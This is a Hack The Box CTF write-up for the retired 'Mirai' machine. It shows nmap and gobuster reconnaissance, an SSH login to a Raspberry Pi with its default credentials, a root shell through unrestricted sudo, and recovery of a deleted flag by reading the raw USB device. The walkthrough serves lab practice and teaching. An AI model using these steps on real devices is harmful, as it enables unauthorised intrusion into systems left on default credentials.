Posted inCTF HTB Retired

Hackthebox Mirai writeup

April 21, 2020No Comments
Hackthebox Mirai writeup
Hackthebox Mirai writeup
Tweet
Share
Share
Pin
0 Shares
0
(0)

Introduction

Hello friends today we will be doing Mirai from hack the box.Which is a easy Linux box which has raspberry pi installed which has default ssh.And then finding the root flag in deleted items.

Hackthebox Mirai writeup

Steps involved

 1-Port Scan
2-Directory enumeration
3-Ssh login with default creds(user.txt)
4-Checking privileges
5-Finding root flag
6-Finding Deleted items

Commands used

 1-nmap -sC -sV -v -O -oV 10.10.10.48
2-gobuster dir -u http://10.10.10.48/ -w /usr/share/wordlists/dirbuster/directory-list-2.3-small.txt
3-ssh [email protected]
4-sudo /bin/bash
5-cd /media/usbstick
6-cat /dev/sdb

Port Scan

Nmap 7.70 scan initiated Tue Apr 21 07:06:12 2020 as: nmap -sC -sV -v -O -oV 10.10.10.48
 Increasing send delay for 10.10.10.48 from 0 to 5 due to 222 out of 739 dropped probes since last increase.
 Nmap scan report for 10.10.10.48
 Host is up (0.27s latency).
 Not shown: 997 closed ports
 PORT   STATE SERVICE VERSION
 22/tcp open  ssh     OpenSSH 6.7p1 Debian 5+deb8u3 (protocol 2.0)
 | ssh-hostkey: 
 |   1024 aa:ef:5c:e0:8e:86:97:82:47:ff:4a:e5:40:18:90:c5 (DSA)
 |   2048 e8:c1:9d:c5:43:ab:fe:61:23:3b:d7:e4:af:9b:74:18 (RSA)
 |   256 b6:a0:78:38:d0:c8:10:94:8b:44:b2:ea:a0:17:42:2b (ECDSA)
 |_  256 4d:68:40:f7:20:c4:e5:52:80:7a:44:38:b8:a2:a7:52 (ED25519)
 53/tcp open  domain  dnsmasq 2.76
 | dns-nsid: 
 |_  bind.version: dnsmasq-2.76
 80/tcp open  http    lighttpd 1.4.35
 | http-methods: 
 |_  Supported Methods: OPTIONS GET HEAD POST
 |_http-server-header: lighttpd/1.4.35
 |_http-title: Site doesn't have a title (text/html; charset=UTF-8).
 No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ).
 TCP/IP fingerprint:
 OS:SCAN(V=7.70%E=4%D=4/21%OT=22%CT=1%CU=31591%PV=Y%DS=2%DC=I%G=Y%TM=5E9ED3F
 OS:9%P=x86_64-pc-linux-gnu)SEQ(SP=101%GCD=1%ISR=10C%TI=Z%CI=I%II=I%TS=8)OPS
 OS:(O1=M54DST11NW6%O2=M54DST11NW6%O3=M54DNNT11NW6%O4=M54DST11NW6%O5=M54DST1
 OS:1NW6%O6=M54DST11)WIN(W1=7120%W2=7120%W3=7120%W4=7120%W5=7120%W6=7120)ECN
 OS:(R=Y%DF=Y%T=40%W=7210%O=M54DNNSNW6%CC=Y%Q=)T1(R=Y%DF=Y%T=40%S=O%A=S+%F=A
 OS:S%RD=0%Q=)T2(R=N)T3(R=N)T4(R=Y%DF=Y%T=40%W=0%S=A%A=Z%F=R%O=%RD=0%Q=)T5(R
 OS:=Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)T6(R=Y%DF=Y%T=40%W=0%S=A%A=Z%F
 OS:=R%O=%RD=0%Q=)T7(R=Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)U1(R=Y%DF=N%
 OS:T=40%IPL=164%UN=0%RIPL=G%RID=G%RIPCK=G%RUCK=G%RUD=G)IE(R=Y%DFI=N%T=40%CD
 OS:=S)
 Uptime guess: 208.866 days (since Wed Sep 25 10:20:25 2019)
 Network Distance: 2 hops
 TCP Sequence Prediction: Difficulty=257 (Good luck!)
 IP ID Sequence Generation: All zeros
 Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
 Read data files from: /usr/bin/../share/nmap
 OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
 Nmap done at Tue Apr 21 07:07:37 2020 -- 1 IP address (1 host up) scanned in 85.82 seconds

Directory enumeration

gobuster dir -u http://10.10.10.48/ -w /usr/share/wordlists/dirbuster/directory-list-2.3-small.txt
Hackthebox Mirai writeup

So I visited the website and found a page.

Hackthebox Mirai writeup

Ssh login with default creds(user.txt)

The page clearly tells that it is a Raspberry Pi.

Which has a default ssh .

And its default creds are :

Username:     pi
Password: raspberry

So lets try .

Hackthebox Mirai writeup

And got a shell as pi.

Checking privileges

Hackthebox Mirai writeup

Got User flag .More over we can run any cmd as root.

Finding root flag

pi@raspberrypi:/ $ sudo /bin/bash
 root@raspberrypi:/# whoami
 root
 root@raspberrypi:/# cd /
 root@raspberrypi:/# cd root
 root@raspberrypi:~# ls
 root.txt
 root@raspberrypi:~# cat root.txt 
 I lost my original root.txt! I think I may have a backup on my USB stickā€¦
 root@raspberrypi:~#

But the root flags seems to be in backup of user’s usb

root@raspberrypi:/media# cd usbstick/
 root@raspberrypi:/media/usbstick# ls
 damnit.txt  lost+found
 root@raspberrypi:/media/usbstick# cat damnit.txt 
 Damnit! Sorry man I accidentally deleted your files off the USB stick.
 Do you know if there is any way to get them back?
 -James
 root@raspberrypi:/media/usbstick#

But we don’t have flag here also .It says that flag is deleted by mistake.

Finding Deleted items

Move back to root directory and type following command which will scan /dev/sdb file system completely and hopefully, it can find deleted root.txt file also.

cat /dev/sdb
Hackthebox Mirai writeup

And we have the root flag.

Thanks for reading please so your support if you liked it.

How useful was this post?

Click on a star to rate it!

Average rating 0 / 5. Vote count: 0

No votes so far! Be the first to rate this post.

As you found this post useful...

Follow us on social media!

We are sorry that this post was not useful for you!

Let us improve this post!

Tell us how we can improve this post?

Post Views: 197
Tags:
Last updated on November 12, 2020

Comments

No comments yet. Why don’t you start the discussion?

Leave a Reply

Your email address will not be published. Required fields are marked *